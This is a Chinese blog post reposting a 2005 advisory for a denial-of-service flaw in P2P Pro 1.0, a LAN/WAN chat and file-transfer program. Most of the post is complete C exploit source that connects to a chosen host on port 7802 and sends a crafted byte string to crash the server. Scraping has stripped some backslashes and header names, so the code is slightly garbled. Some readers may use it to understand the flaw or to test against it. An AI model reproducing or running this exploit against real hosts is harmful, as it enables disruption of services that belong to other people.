ITPub博客

首页 > Linux操作系统 > Linux操作系统 > P2P Pro Command DoS

P2P Pro Command DoS

原创 Linux操作系统 作者:coolwinds 时间:2005-09-06 10:13:09 0 删除 编辑
P2P Pro is "freeware/opensource who need have own chat system to talk on private LAN or WAN. It allows two users to chat and send files (of any size). This is a stand-alone application, meaning there are not two programs (client and server).The client and server are both built in to the same application". By sending a special command to P2P Pro server it possible for a remote attacker to cause it to crash.[@more@]

Vulnerable Systems:
* P2P Pro version 1.0

Exploit:
/*
P2P Pro Command DOS Exploit
------------------------------------
Infam0us Gr0up - Securiti Research

Info: infamous.2hell.com
Vendor URL: http://www.digital-revolution.org/P2PPro.html

*/

#include
#include
#include

#pragma comment(lib, "ws2_32.lib")

char doscore[] =
"x3fx3fxbcx59x70 "
"x32x70x3fxe1 "
"x2bx5cx3fxa6xebxa6"
"x50x46x2bx5cx3fxa6xebxa6"
"x50x4fx57x4ex45x44x2ex74"
"x78x74x2bx5cx3fxa6xebxa6"
"x50x31x32x33x32x34x32x2ex6bx62";


int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

if (argc < 2)
{
printf(" P2P Pro Command DOS Exploit n", argv[0]);
printf(" --------------------------------------n", argv[0]);
printf(" Infam0us Gr0up - Securiti Researchnn", argv[0]);
printf("[-]Usage: %s [target] [port]n", argv[0]);
printf("[?]Exam: %s localhost 7802n", argv[0]);
exit(1);
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

target = argv[1];
port = 7802;

if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR n");
exit(1);
}
printf(" P2P Pro Command DOS Exploit n", argv[0]);
printf(" --------------------------------------rnn", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED n", argv[0]);
exit(1);
}
printf("[OK]n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILEDn");
exit(1);
}
printf("[OK]n");
printf("Target listen.. n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERRORn");
closesocket(inetdos);
exit(1);
}
printf("[OK]n ");
printf("[+] Server SHUTDOWNED!n");
closesocket(inetdos);
WSACleanup();
return 0;
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-805957/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    947365